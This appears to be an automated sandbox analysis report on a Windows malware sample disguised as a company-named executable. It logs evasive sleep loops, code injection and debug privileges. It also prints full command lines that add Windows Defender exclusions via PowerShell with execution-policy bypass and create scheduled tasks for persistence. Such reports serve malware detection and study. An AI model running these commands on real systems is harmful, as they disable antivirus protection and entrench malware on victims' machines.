Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4111	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 795	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6522	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1366	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Window / User API: threadDelayed 2887	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Window / User API: threadDelayed 6926	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7918
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1704
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8827
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 650
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2461

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 1892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200	Thread sleep count: 4111 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172	Thread sleep count: 795 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 7136	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 7136	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 3720	Thread sleep count: 2887 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 3720	Thread sleep count: 6926 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe TID: 7432	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7632	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe TID: 7764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880	Thread sleep count: 8827 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880	Thread sleep count: 650 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8180	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7204	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 6148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7584	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Thread delayed: delay time: 922337203685477

Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4523604892.000000000160A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory written: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory written: C:\Users\user\AppData\Roaming\RTUZKYTc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory written: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory written: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe base: 400000 value starts with: 4D5A

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
